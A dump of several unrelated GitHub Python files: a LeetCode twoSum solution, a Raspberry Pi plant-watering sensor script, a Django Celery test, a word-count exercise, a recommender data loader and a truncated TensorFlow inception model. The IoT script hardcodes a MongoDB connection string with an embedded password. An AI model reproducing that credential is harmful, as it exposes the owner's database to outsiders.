state[\"prizes\"])\n\n # Test the bootstrap data.\n self.assertEqual (self.getRpc (\"getbootstrapdata\"), {\n \"regions\": regions,\n })\n\n\nif __name__ == \"__main__\":\n SplitStateRpcsTest ().main 
()\n","repo_name":"xaya/taurion_gsp","sub_path":"gametest/splitstaterpcs.py","file_name":"splitstaterpcs.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"7433748996","text":"class Solution:\n def twoSum(self, nums, target):\n lens = len(nums)\n\n \n for i in range(lens):\n #print(i)\n for j in range(i+1, lens):\n #print(nums[i], nums[j], target)\n if nums[i] + nums[j] == target:\n #print(\"aa\")\n return [i, j]\n\n return []\n\n def twoSum_2(self, nums, target):\n lens = len(nums)\n\n dicts = {}\n\n for i in range(lens):\n another = target - nums[i]\n if(another in dicts):\n return [dicts[another], i]\n\n dicts[nums[i]] = i\n\n #print(dicts)\n for k,v in dicts.items():\n another = target - k\n\n #print(k, another)\n if(k!=another and another in dicts):\n return [v, dicts[another]]\n \n \n\n return []\n\n\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n t1 = [3, 2, 4]\n t2 = 6\n\n result = solution.twoSum_2(t1, t2)\n\n print(result)","repo_name":"geniuscynic/leetcode","sub_path":"python/0001.py","file_name":"0001.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71457343505","text":"import time\nimport datetime\nimport smbus\nimport spidev\nimport DHT\nimport pigpio\nimport RPi.GPIO as GPIO\nimport signal\nimport websocket\nimport threading\nimport rel\nimport datetime\nimport pymongo\nfrom pymongo import MongoClient\n\n# url of WebSocket server\nurl = \"ws://192.168.0.13:3000\"\n\n# Pin number to control water pump\nWATER_PIN = 21 # GPIO21 (BCM)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(WATER_PIN, GPIO.OUT)\n\n# pin configurations\nDHT_PIN = 18 # GPIO18, pin12\n\n# I2C light intensity variables\nI2C_CHANNEL = 1 # I2C channel1 is connected to GPIO pins\nI2C_ADDRESS = 0x23 # I2C address of light intensity sensor\nCONTINUOUS_HIGH_RES_MODE = 0x10 # start measuring at 1 lux res, measurement time ~120ms\nONE_TIME_HIGH_RES_MODE = 0x20\n\n# SPI soil moisture variables\nspi_bus = 0\nspi_chip_select = 0\n\n# Database client\nclient = pymongo.MongoClient(\"mongodb+srv://IoTwebapp:T8hz4Xe4Z4pY5cDI@rpi-sensor-data.vmud14a.mongodb.net/?retryWrites=true&w=majority\")\n# Database \ndb = client.SensorData\n# Collections\ncollectionHumidity = db.HumidityData\ncollectionLightIntensity = db.LightIntensityData\ncollectionTemperature = db.TemperatureData\ncollectionSoil = db.SoilMoistureData\n\nplantStatus = 'OK'\n\n# --- Configurations ---\n# These configuration options can be updated by the server via a WebSocket\n\n# Configurable optimal levels for temperature/humidity/soil moisture/light exposure time\n# will send alerts to server if plant measurements leave these bounds\noptimalLevels = {'tempLower': 60, 'tempUpper': 85, \n\t\t'humidityLower': 30, 'humidityUpper': 95,\n\t\t'soilMoistureSetpoint': 50,\n\t\t'sunlightTime': 4.5,\n\t\t'wateringTime': 40}\n# Watering mode\n# manual = only water when user gives the command\n# time = water every 'wateringTime' hours\n# soil_moisture = attempt to keep the soil moisture hovering around the setpoint on average\nwateringMode = \"manual\"\n\n# have to call GPIO cleanup when program is terminated\n# with CTRL+C to properly clean up GPIO for the next time the program is run\ndef cleanup(signum, frame):\n GPIO.cleanup()\nsignal.signal(signal.SIGINT, cleanup)\n\n# --- DEVICE FUNCTIONS ---\n# Functions for interfacing with devices wired to the RPi\ndef 
configure_devices():\n\tdhtSensor = DHT.sensor(pigpio.pi(), DHT_PIN, model=DHT.DHTXX) \n\tbus = smbus.SMBus(I2C_CHANNEL)\n\tspi = spidev.SpiDev()\n\tspi.open(spi_bus, spi_chip_select)\n\tspi.mode = 0\n\tspi.max_speed_hz = 500000\n\ttime.sleep(0.5) \n\treturn dhtSensor, bus, spi\n\ndef read_temp_humidity(sensor):\n\ttimestamp, gpio, status, temperature_c, humidity = sensor.read()\n\ttemperature_f = temperature_c * (9/5) + 32\n\treturn temperature_f, humidity\n\t\ndef read_light_intensity(i2c_bus):\n\ti2c_bus.write_byte(I2C_ADDRESS, ONE_TIME_HIGH_RES_MODE) # trigger measurement\n\ttime.sleep(1) # need at least 120ms to take measurement\n\traw = i2c_bus.read_word_data(I2C_ADDRESS,0x00) # read data\n\t# bytes in measurement will be swapped when read in \n\tlight_intensity = ((raw & 0xff00) >> 8) | ((raw & 0x00ff) << 8)\n\treturn light_intensity\n\ndef read_soil_moisture(spi):\n\traw = spi.readbytes(2)\n\traw = (raw[0]<<8)|raw[1]\n\t#print(f\"Soil moisture raw {raw}\")\n\t# in testing, saturated soil read 1100-1400 and dry soil read 2700-3100\n\t# so use 1100 as upper soil moisture & 3100 as lower soil moisture\n\treturn 100 - 100*float(raw-1100)/(3100-1100)\n\ndef run_water_pump(seconds):\n\tGPIO.output(WATER_PIN, GPIO.HIGH)\n\ttime.sleep(seconds)\n\tGPIO.output(WATER_PIN, GPIO.LOW)\n\n# --- NETWORK FUNCTIONS ---\n# Functions to communicate with the WebSocket server & MongoDB server\n\n# WebSocket functions\ndef on_message(ws, message):\n\tmsg_parts = message.split(':') \n\tif msg_parts[0] == \"waterPlant\":\n\t\trun_water_pump(2)\n\t\tprint(\"trigger plant watering!\")\n\telif msg_parts[0] == 'wateringMethodChange':\n\t\tglobal wateringMode\n\t\twateringMode = msg_parts[1]\n\t\tprint(f\"Change watering method to {msg_parts[1]}\")\n\t\t\n\telif msg_parts[0] == 'alertLevelsChange':\n\t\tprint(f\"Change alert levels\")\n\t\tglobal optimalLevels\n\t\toptimalLevels['tempLower'] = int(msg_parts[1].split('_')[0])\n\t\toptimalLevels['tempUpper'] = int(msg_parts[1].split('_')[1])\n\t\toptimalLevels['humidityLower'] = int(msg_parts[2].split('_')[0])\n\t\toptimalLevels['humidityUpper'] = int(msg_parts[2].split('_')[1])\n\t\toptimalLevels['soilMoistureSetpoint'] = int(msg_parts[3])\n\t\toptimalLevels['sunlightTime'] = int(msg_parts[4])\n\t\toptimalLevels['wateringTime'] = int(msg_parts[5])\n\n\t\tprint(optimalLevels)\n\t\t\n\tws.send('Message receipt acknowledged')\n\t\ndef on_error(ws, error):\n\tprint(error)\n\t\ndef on_close(ws, close_status_code, close_msg):\n\tprint(\"Connection closed\")\n\t\ndef on_open(ws):\n\tprint(\"Opened connection\")\n\ndef connect_websocket():\n\t# Start WebSocket connection\n\twebsocket.enableTrace(True)\n\tws = websocket.WebSocketApp(url,\n\t\t\t\t\t\t\ton_open=on_open, \n\t\t\t\t\t\t\ton_message=on_message,\n\t\t\t\t\t\t\ton_error=on_error,\n\t\t\t\t\t\t\ton_close=on_close)\n\t# Open the WebSocket server in a separate thread\n\t# so the Pi can continue to collect sensor data\n\twst = threading.Thread(target=ws.run_forever)\n\twst.daemon = True\n\twst.start()\n\n\treturn ws\n\n\n# Upload data to MongoDB server\ndef upload_data(humidity, temp, lx, soil):\n    # Format of Data\n    SensorData = {\n        'Data':humidity,\n        'SensorID':'TempHumidity_1',\n        'SensorName': 'Humidity Sensor',\n        'TimeCollected': datetime.datetime.now()\n    }\n    collectionHumidity.insert_one(SensorData)\n    \n    # Format of Data\n    SensorData = {\n        'Data':temp,\n        'SensorID':'TempHumidity_1',\n        'SensorName': 'Temperature Sensor',\n        'TimeCollected': datetime.datetime.now()\n    }\n    
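# same document shape as the humidity record above; each reading goes to its own collection\n    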
collectionTemperature.insert_one(SensorData)\n    \n    # Format of Data\n    SensorData = {\n        'Data':lx,\n        'SensorID':'LightIntensity_1',\n        'SensorName': 'Light Intensity Sensor',\n        'TimeCollected': datetime.datetime.now()\n    }\n    collectionLightIntensity.insert_one(SensorData)\n    \n    # Format of Data\n    SensorData = {\n        'Data':soil,\n        'SensorID':'SoilMoisture_1',\n        'SensorName': 'Soil Moisture Sensor',\n        'TimeCollected': datetime.datetime.now()\n    }\n    collectionSoil.insert_one(SensorData)\n\n\nif __name__ == \"__main__\":\n\tdhtSensor, i2c_bus, spi = configure_devices()\n\n\t# Note that with this current setup the server must\n\t# be started before running this script\n\ttry:\n\t\tws = connect_websocket()\n\texcept Exception as e:\n\t\tprint(\"WebSocket failed to connect\")\n\t\tprint(e)\n\t\t\n\twateringPause = False\n\tlastWatered = None\n\twhile True:\n\t\tnow = time.time()\n\t\t# gather data from various sensors\n\t\tt, h = read_temp_humidity(dhtSensor)\n\t\tlx = read_light_intensity(i2c_bus)\n\t\tsoil_moisture = read_soil_moisture(spi)\n\t\t# upload data to MongoDB database\n\t\tupload_data(h,t,lx,soil_moisture)\n\n\t\tnewPlantStatus = []\n\t\tif t > optimalLevels['tempUpper']:\n\t\t\tnewPlantStatus.append('TEMP_HIGH')\n\t\telif t < optimalLevels['tempLower']:\n\t\t\tnewPlantStatus.append('TEMP_LOW')\n \n\t\tif h > optimalLevels['humidityUpper']:\n\t\t\tnewPlantStatus.append('HUMIDITY_HIGH')\n\t\telif h < optimalLevels['humidityLower']:\n\t\t\tnewPlantStatus.append('HUMIDITY_LOW')\n\n\t\tif len(newPlantStatus) == 0:\n\t\t\tnewPlantStatus = \"OK\"\n\t\telse:\n\t\t\tnewPlantStatus = ','.join(newPlantStatus)\n\n\t\t# Update plant status to server if measurements fall outside optimal levels\n\t\tif newPlantStatus != plantStatus:\n\t\t\tws.send(f'plantStatus:{newPlantStatus}')\n\t\tplantStatus = newPlantStatus\n\n\t\t# water based on soil moisture\n\t\t# if we just watered, wait 2 minutes before concluding it wasn't enough\n\t\t# and watering again\n\t\tif wateringMode == \"soil_moisture\" and (lastWatered is None or now-lastWatered > 120):\n\t\t\t# don't water until we're ~10% below where we should be\n\t\t\tif soil_moisture < 0.9*optimalLevels['soilMoistureSetpoint']:\n\t\t\t\trun_water_pump(3)\n\t\t\t\tlastWatered = time.time()\n\t\t# water based on time since last watered\n\t\t# uses seconds for testing, real system would use hours\n\t\telif wateringMode == \"time\" and (lastWatered is None or now-lastWatered > int(optimalLevels['wateringTime'])):\n\t\t\trun_water_pump(3)\n\t\t\tlastWatered = time.time() \n\n \n\t\tprint(f\"Temperature:{t}\\nHumidity:{h}\\nLight Intensity:{lx}\\nSoil Moisture:{soil_moisture}\\n\")\n\t\ttime.sleep(3)\n\tGPIO.cleanup()\n","repo_name":"aHarry01/IoT_Final_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"33641254224","text":"\nfrom datetime import datetime, timedelta\n\nfrom django.contrib.auth.models import User\nfrom django.core import mail\nfrom django.test import TestCase\nfrom pytz import timezone\n\nfrom tasks.models import Task, TaskReport\nfrom tasks.tasks import get_user_tasks_status, send_email_report\n\n\nclass TestCeleryFunction(TestCase):\n\n    def setUp(self):\n        self.user = User.objects.create(username='test_user_1')\n        self.user.set_password('pass123')\n        self.user.save()\n\n    def create_tasks(self, length=1, user=None, completed=False, deleted=False, status='PENDING'):\n        for i in range(1, length + 1):\n            
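# each generated task gets a distinct title and description; priority mirrors the loop index\n            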
Task.objects.create(\n                user=user, \n                title=f\"TEST TASK {i} TITLE\", \n                description=f\"Test task {i} description\", \n                priority=i, \n                deleted=deleted, \n                completed=completed,\n                status=status\n            )\n    \n    def test_send_email_report(self):\n        curr_time = datetime.now(tz=timezone('UTC')) - timedelta(minutes=10)\n        task_report = TaskReport.objects.create(user=self.user, user_mail='mail@abc.com', report_time='11:00', next_run_at=curr_time)\n        result = send_email_report.apply()\n\n        self.assertTrue(result.successful())\n        self.assertEqual(len(mail.outbox), 1)\n        self.assertEqual(mail.outbox[0].recipients()[0], task_report.user_mail)\n        self.assertEqual(TaskReport.objects.get(user=self.user).next_run_at, curr_time + timedelta(days=1))\n\n    def test_get_user_tasks_status(self):\n        self.create_tasks(1, user=self.user)\n        self.create_tasks(1, user=self.user, completed=True, status='COMPLETED')\n        self.create_tasks(1, user=self.user, status='IN_PROGRESS')\n        self.create_tasks(1, user=self.user, status='CANCELLED')\n\n        founded_message = get_user_tasks_status(self.user)\n        expected_message = f\"Hi {self.user.username},\\n\\nHere is your tasks report for today:\\n\\nTotal tasks added: 4\\nPending tasks: 1\\nIn Progress tasks: 1\\nCompleted tasks: 1\\nCancelled tasks: 1\\n\\nThanks\"\n\n        self.assertEqual(founded_message, expected_message)\n","repo_name":"localhost-8000/UnitTesting_django_task_manager","sub_path":"tasks/tests/test_celery_scheduler.py","file_name":"test_celery_scheduler.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"29171542152","text":"import time\ndef text_to_words(the_text):\n    \"\"\" return a list of words with all punctuation removed,\n        and all in lowercase.\n    \"\"\"\n\n    my_substitutions = the_text.maketrans(\n        # If you find any of these\n        \"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&()*+,-./:;<=>?@[]^_`{|}~'\\\\\",\n        # Replace them by these\n        \"abcdefghijklmnopqrstuvwxyz                                          \")\n\n    # Translate the text now.\n    cleaned_text = the_text.translate(my_substitutions)\n    wds = cleaned_text.split()\n    return wds\n\n##open alice, make a list out of all the words minus punctuation and capitals.\n##PROBLEM: this splits up words like wouldn't into wouldn and t\nt0 = time.perf_counter()\nf = open(\"alice.txt\")\ncontent = f.read()\nf.close()\nthe_words = text_to_words(content)\n\n##add dictionary keys\ndictionary = {}\nfor i in the_words:\n    if i not in dictionary: ##no repeat counting!\n        dictionary[i] = the_words.count(i) ##find frequency\n\n#got to turn this back into a list to alphabetize.\nalpha_words = list(dictionary.items())\nalpha_words.sort()\n\n#write to a new file\ng = open(\"alice_words.txt\", \"w\")\ndash = '-' * 31 + \"\\n\"\nfor i in range(len(alpha_words)):\n    if i == 0:\n        g.write(\"{0:<30s}{1:s} \\n\".format(\"WORD\", \"COUNT\"))\n        g.write(dash)\n    g.write(\"{0:<30s} {1:d} \\n\".format(alpha_words[i][0],alpha_words[i][1]))\n\ng.close()\nt1 = time.perf_counter()\nprint(\"That took {} seconds to complete!\".format(t1-t0))\n\n\n\n\n\n","repo_name":"kprahman/py_book_exercises","sub_path":"ch20/alice_words.py","file_name":"alice_words.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"72065063826","text":"import os\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport itertools\n\n''' TrainDatabase is inspired by various python libraries like scikit-learn, which use dicts to \ndeal with 
sparse matrices, and such sparse matrices appear throughout this course.\nMoreover, you might ask: why use their design and not develop your own?\nThe answer is simple: this is not a DB design course, hence I have not bothered to develop newer DB paradigms.\n'''\n\nfrom four_svd.train_db import TrainDatabase\n\n\nclass Database:\n\n    def __init__(self, folds_files=None, sep = \"\\t\"):\n        self.sep = sep\n        self.fold_files = folds_files\n\n    def actual_ratings_file_foldwise(self):\n        for train_file, test_file in self.fold_files:\n            with open(train_file) as f:\n                actual_train_ratings = [self.parse_line(line) for line in\n                                        itertools.islice(f, 0, None)]\n            with open(test_file) as f:\n                actual_test_ratings = [self.parse_line(line) for line in\n                                       itertools.islice(f, 0, None)]\n            yield actual_train_ratings, actual_test_ratings\n\n\n    def construct_trainset(self, actual_trainset):\n\n        actual2smart_id_users = {}\n        actual2smart_id_items = {}\n\n        current_u_index = 0\n        current_i_index = 0\n\n        u_dict = defaultdict(list)\n        r_dict = defaultdict(list)\n\n        for urid, irid, r in actual_trainset:\n            try:\n                uid = actual2smart_id_users[urid]\n            except KeyError:\n                uid = current_u_index\n                actual2smart_id_users[urid] = current_u_index\n                current_u_index += 1\n            try:\n                iid = actual2smart_id_items[irid]\n            except KeyError:\n                iid = current_i_index\n                actual2smart_id_items[irid] = current_i_index\n                current_i_index += 1\n\n            u_dict[uid].append((iid, r))\n            r_dict[iid].append((uid, r))\n\n        total_users = len(u_dict)  # number of users\n        total_items = len(r_dict)  # number of items\n        total = len(actual_trainset)\n\n        trainset = TrainDatabase(u_dict,\n                                 r_dict,\n                                 total_users,\n                                 total_items,\n                                 # total,\n\n                                 actual2smart_id_users,\n                                 actual2smart_id_items)\n\n        return trainset\n\n    def folds(self):\n        for actual_trainData, actual_testData in self.actual_ratings_file_foldwise():\n            trainset = self.construct_trainset(actual_trainData)\n            yield trainset, actual_testData\n\n\n    def parse_line(self, line):\n        line = line.split(self.sep)\n        uid, iid, r = (line[i].strip()\n                       for i in [0, 1, 2])\n        return uid, iid, float(r)\n\n\n","repo_name":"himanshusagar/cf_mid_sem","sub_path":"four_svd/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"21726157387","text":"import functools\nimport tensorflow as tf\n\nfrom data import image_size, num_channels, num_labels\nfrom model import Model\nfrom neural_network import get_filter_output_size, depth_concat, get_l2_loss\n\n\nprint_messages = False\n\nclass Module():\n\n    def __init__(self, one_by_one_conv_weights_to_three_by_three, one_by_one_conv_biases_to_three_by_three, one_by_one_conv_weights_to_five_by_five, one_by_one_conv_biases_to_five_by_five,\n                 one_by_one_conv_weights_to_depthconcat, one_by_one_conv_biases_to_depthconcat, one_by_one_conv_weights_from_max_pool, one_by_one_conv_biases_from_max_pool, three_by_three_conv_weights,\n                 three_by_three_conv_biases, five_by_five_conv_weights, five_by_five_conv_biases):\n        self.one_by_one_conv_weights_to_three_by_three = one_by_one_conv_weights_to_three_by_three\n        self.one_by_one_conv_biases_to_three_by_three = one_by_one_conv_biases_to_three_by_three\n        self.one_by_one_conv_weights_to_five_by_five = one_by_one_conv_weights_to_five_by_five\n        self.one_by_one_conv_biases_to_five_by_five = one_by_one_conv_biases_to_five_by_five\n        self.one_by_one_conv_weights_to_depthconcat = one_by_one_conv_weights_to_depthconcat\n        
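# the direct 1x1 path goes straight to the DepthConcat, with no 3x3 or 5x5 conv after it\n        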
self.one_by_one_conv_biases_to_depthconcat = one_by_one_conv_biases_to_depthconcat\n self.one_by_one_conv_weights_from_max_pool = one_by_one_conv_weights_from_max_pool\n self.one_by_one_conv_biases_from_max_pool = one_by_one_conv_biases_from_max_pool\n self.three_by_three_conv_weights = three_by_three_conv_weights\n self.three_by_three_conv_biases = three_by_three_conv_biases\n self.five_by_five_conv_weights = five_by_five_conv_weights\n self.five_by_five_conv_biases = five_by_five_conv_biases\n\n def get_weights(self):\n return [self.one_by_one_conv_weights_to_three_by_three, self.one_by_one_conv_weights_to_five_by_five, self.one_by_one_conv_weights_to_depthconcat,\n self.one_by_one_conv_weights_from_max_pool, self.three_by_three_conv_weights, self.five_by_five_conv_weights]\n\ndef create_inception_module(in_channels, feature_maps, input_spatial_size, initialised_weights_stddev):\n \"\"\"\n Inception module:\n input layer\n 1x1+1 conv, 1x1+1 conv, 3x3+1 maxpool\n 1x1+1 conv, 3x3+1 conv, 5x5+1 conv, 1x1+1 conv\n DepthConcat\n \"\"\"\n _1x1_fm, _1x1_3x3_fm, _3x3_fm, _1x1_5x5_fm, _5x5_fm, mp_1x1_fm = feature_maps\n patch_size = 1\n one_by_one_conv_weights_to_three_by_three = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, in_channels, _1x1_3x3_fm], stddev=initialised_weights_stddev), name='1x1w_to_3x3')\n one_by_one_conv_biases_to_three_by_three = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_1x1_3x3_fm]), name='1x1b_to_3x3')\n \n one_by_one_conv_weights_to_five_by_five = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, in_channels, _1x1_5x5_fm], stddev=initialised_weights_stddev), name='1x1w_to_5x5')\n one_by_one_conv_biases_to_five_by_five = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_1x1_5x5_fm]), name='1x1b_to_5x5')\n \n one_by_one_conv_weights_to_depthconcat = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, in_channels, _1x1_fm], stddev=initialised_weights_stddev), name='1x1w_to_depth_concat')\n one_by_one_conv_biases_to_depthconcat = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_1x1_fm]), name='1x1b_to_depth_concat')\n \n #number_of_max_pools = 1\n #three_by_three_max_pool_output_size = get_filter_output_size(image_size, number_of_max_pools)\n max_pool_size = 3\n max_pool_stride = 1\n three_by_three_max_pool_output_size = get_filter_output_size(input_spatial_size, max_pool_size, max_pool_stride)\n if print_messages: print(\"three_by_three_max_pool_output_size: %s\" % three_by_three_max_pool_output_size)\n one_by_one_conv_weights_from_max_pool = tf.Variable(tf.truncated_normal(\n [three_by_three_max_pool_output_size, three_by_three_max_pool_output_size, in_channels, mp_1x1_fm], stddev=initialised_weights_stddev),\n name='1x1w_from_maxpool')\n one_by_one_conv_biases_from_max_pool = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[mp_1x1_fm]), name='1x1b_from_maxpool')\n \n patch_size = 3\n three_by_three_conv_weights = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, _1x1_3x3_fm, _3x3_fm], stddev=initialised_weights_stddev), name='3x3w')\n three_by_three_conv_biases = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_3x3_fm]), name='3x3b')\n \n patch_size = 5\n five_by_five_conv_weights = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, _1x1_5x5_fm, _5x5_fm], stddev=initialised_weights_stddev), name='5x5w')\n five_by_five_conv_biases = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_5x5_fm]), name='5x5b')\n\n # The 3x3 
maxpooling layer, and DepthConcat layer don't need any variables.\n return Module(one_by_one_conv_weights_to_three_by_three, one_by_one_conv_biases_to_three_by_three, one_by_one_conv_weights_to_five_by_five, one_by_one_conv_biases_to_five_by_five,\n one_by_one_conv_weights_to_depthconcat, one_by_one_conv_biases_to_depthconcat, one_by_one_conv_weights_from_max_pool, one_by_one_conv_biases_from_max_pool, three_by_three_conv_weights,\n three_by_three_conv_biases, five_by_five_conv_weights, five_by_five_conv_biases)\n\ndef create_inception_module_graph(module, input_tensor):\n # Adjacent layer 1\n if print_messages: print(\"input_tensor shape:\", input_tensor.get_shape().as_list())\n if print_messages: print(\"one_by_one_conv_weights_to_three_by_three shape:\", module.one_by_one_conv_weights_to_three_by_three.get_shape().as_list())\n conv = tf.nn.conv2d(input_tensor, module.one_by_one_conv_weights_to_three_by_three, [1, 1, 1, 1], padding='SAME')\n one_by_one_conv_weights_to_three_by_three_output = tf.nn.relu(conv + module.one_by_one_conv_biases_to_three_by_three)\n if print_messages: print(\"one_by_one_conv_weights_to_three_by_three_output shape:\", one_by_one_conv_weights_to_three_by_three_output.get_shape().as_list())\n\n conv = tf.nn.conv2d(input_tensor, module.one_by_one_conv_weights_to_five_by_five, [1, 1, 1, 1], padding='SAME')\n one_by_one_conv_weights_to_five_by_five_output = tf.nn.relu(conv + module.one_by_one_conv_biases_to_five_by_five)\n shape = one_by_one_conv_weights_to_five_by_five_output.get_shape().as_list()\n if print_messages: print(\"one_by_one_conv_weights_to_five_by_five_output shape: %s\" % shape)\n\n max_pool_output = tf.nn.max_pool(input_tensor, [1, 3, 3, 1], [1, 1, 1, 1], padding='SAME')\n shape = max_pool_output.get_shape().as_list()\n if print_messages: print(\"max_pool_output shape: %s\" % shape)\n\n # Adjacent layer 2\n conv = tf.nn.conv2d(input_tensor, module.one_by_one_conv_weights_to_depthconcat, [1, 1, 1, 1], padding='SAME')\n one_by_one_output_to_depthconcat = tf.nn.relu(conv + module.one_by_one_conv_biases_to_depthconcat)\n shape = one_by_one_output_to_depthconcat.get_shape().as_list()\n if print_messages: print(\"one_by_one_output_to_depthconcat shape: %s\" % shape)\n\n conv = tf.nn.conv2d(one_by_one_conv_weights_to_three_by_three_output, module.three_by_three_conv_weights, [1, 1, 1, 1], padding='SAME')\n three_by_three_output = tf.nn.relu(conv + module.three_by_three_conv_biases)\n shape = three_by_three_output.get_shape().as_list()\n if print_messages: print(\"three_by_three_output shape: %s\" % shape)\n\n conv = tf.nn.conv2d(one_by_one_conv_weights_to_five_by_five_output, module.five_by_five_conv_weights, [1, 1, 1, 1], padding='SAME')\n five_by_five_output = tf.nn.relu(conv + module.five_by_five_conv_biases)\n shape = five_by_five_output.get_shape().as_list()\n if print_messages: print(\"five_by_five_output shape: %s\" % shape)\n\n if print_messages: print(\"one_by_one_conv_weights_from_max_pool:\", module.one_by_one_conv_weights_from_max_pool.get_shape().as_list())\n conv = tf.nn.conv2d(max_pool_output, module.one_by_one_conv_weights_from_max_pool, [1, 1, 1, 1], padding='SAME')\n one_by_one_conv_weights_from_max_pool_output = tf.nn.relu(conv + module.one_by_one_conv_biases_from_max_pool)\n shape = one_by_one_conv_weights_from_max_pool_output.get_shape().as_list()\n if print_messages: print(\"one_by_one_conv_weights_from_max_pool_output shape: %s\" % shape)\n \n depth_concat_output = depth_concat([one_by_one_output_to_depthconcat, three_by_three_output, 
five_by_five_output, one_by_one_conv_weights_from_max_pool_output])\n    shape = depth_concat_output.get_shape().as_list()\n    if print_messages: print(\"depth_concat_output shape: %s\" % shape)\n    return depth_concat_output\n\ndef get_depth_concat_depth(module_feature_maps):\n    num_of_feature_maps = 6\n    _1x1_fm, _1x1_3x3_fm, _3x3_fm, _1x1_5x5_fm, _5x5_fm, mp_1x1_fm = range(num_of_feature_maps)\n    return module_feature_maps[_1x1_fm] + module_feature_maps[_3x3_fm] + module_feature_maps[_5x5_fm] + module_feature_maps[mp_1x1_fm]\n\ndef create_inception_module_model(learning_rate = 0.05, initialised_weights_stddev = 0.1, pre_layer_feature_maps = 64, module_feature_maps=[(128, 128, 128, 128, 128, 128)], batch_size = 32, eval_batch_size = 1000, l2_lambda = 0.1, decay_steps = 10000, decay_rate = 0.96, add_pre_layer_maxpool = False):\n    graph = tf.Graph()\n    with graph.as_default():\n\n        # Input data.\n        tf_train_dataset = tf.placeholder(tf.float32, shape=(batch_size, image_size, image_size, num_channels))\n        tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))\n        eval_dataset = tf.placeholder(tf.float32, shape=(eval_batch_size, image_size, image_size, num_channels))\n        dropout_keep_probability = tf.placeholder(tf.float32)\n        \"\"\"\n        In the inception module, we have the following layers:\n        Pre layers:\n            7x7 conv + 2(S)\n\tmaxpool 3x3 + 2(s)\n\tlocal response normalisation\n\n            #1x1 conv + 1(V)\n\t#maxpool 3x3 + 1(s)\n\t#local response normalisation\n        \n        Inception modules: 1\n        \n        Post layers:\n        AveragePool\n        \n        Fully Connected Output layer\n        \"\"\"\n        \n        # Pre layers\n        post_layer_output_feature_maps = pre_layer_feature_maps\n        patch_size = 7\n        stride = 2\n        seven_by_seven_conv_pre_layer_weights = tf.Variable(tf.truncated_normal(\n            [patch_size, patch_size, num_channels, post_layer_output_feature_maps], stddev=initialised_weights_stddev), name='7x7_pre_w')\n        seven_by_seven_conv_pre_layer_biases = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[post_layer_output_feature_maps]), name='7x7_pre_b')\n        if print_messages: print(\"image_size:\", image_size)\n        seven_by_seven_conv_pre_layer_output_size = get_filter_output_size(image_size, patch_size, stride)\n        if print_messages: print(\"seven_by_seven_conv_pre_layer_output_size:\", seven_by_seven_conv_pre_layer_output_size)\n\n        three_by_three_maxpool_pre_layer_output_size = get_filter_output_size(seven_by_seven_conv_pre_layer_output_size, patch_size, stride)\n        #pre_layer_output_spatial_size\n        if print_messages: print(\"three_by_three_maxpool_pre_layer_output_size:\", three_by_three_maxpool_pre_layer_output_size)\n        \n        # Module layers\n        modules = []\n        in_channels = post_layer_output_feature_maps \n        in_spatial_size = three_by_three_maxpool_pre_layer_output_size if add_pre_layer_maxpool else seven_by_seven_conv_pre_layer_output_size\n        number_of_reducing_layers = 2\n        stride = 1\n        number_of_adjacent_layers_in_inception_module = 4\n        for feature_maps in module_feature_maps:\n            if print_messages: print(\"in_spatial_size:\", in_spatial_size)\n            module = create_inception_module(in_channels, feature_maps, in_spatial_size, initialised_weights_stddev)\n            modules.append(module)\n            in_channels = get_depth_concat_depth(feature_maps)\n            in_spatial_size = get_filter_output_size(in_spatial_size, number_of_reducing_layers, stride)\n\n        # Now a fully connected layer\n        depth_concat_depth = in_channels #module_feature_maps[-1] * number_of_adjacent_layers_in_inception_module\n        # I expect avg_pool_output to have a shape of (batch_size, 1, 1, depth_concat_depth)\n        # 
WARNING: I may have gotten the fc_weights tensor size wrong.\n fc_layer_one_neurons = 1000\n fc_layer_one_weights = tf.Variable(tf.truncated_normal(\n [depth_concat_depth, fc_layer_one_neurons], stddev=initialised_weights_stddev * 10))\n fc_layer_one_biases = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[fc_layer_one_neurons]))\n \n output_weights = tf.Variable(tf.truncated_normal(\n [fc_layer_one_neurons, num_labels], stddev=initialised_weights_stddev))\n output_biases = tf.Variable(tf.constant(1.0, shape=[num_labels]))\n \n # Model.\n def create_model_graph(data, add_dropout = False):\n shape = data.get_shape().as_list()\n if print_messages: print(\"data shape: %s\" % shape)\n \n # Pre layers\n # 7x7_pre\n stride = 2\n conv = tf.nn.conv2d(data, seven_by_seven_conv_pre_layer_weights, [1, stride, stride, 1], padding='SAME')\n seven_by_seven_conv_pre_layer_output = tf.nn.relu(conv + seven_by_seven_conv_pre_layer_biases)\n if print_messages: print(\"one_by_one_conv_weights_to_three_by_three_output shape: %s\" % seven_by_seven_conv_pre_layer_output.get_shape().as_list())\n \n lrn_input = None\n if 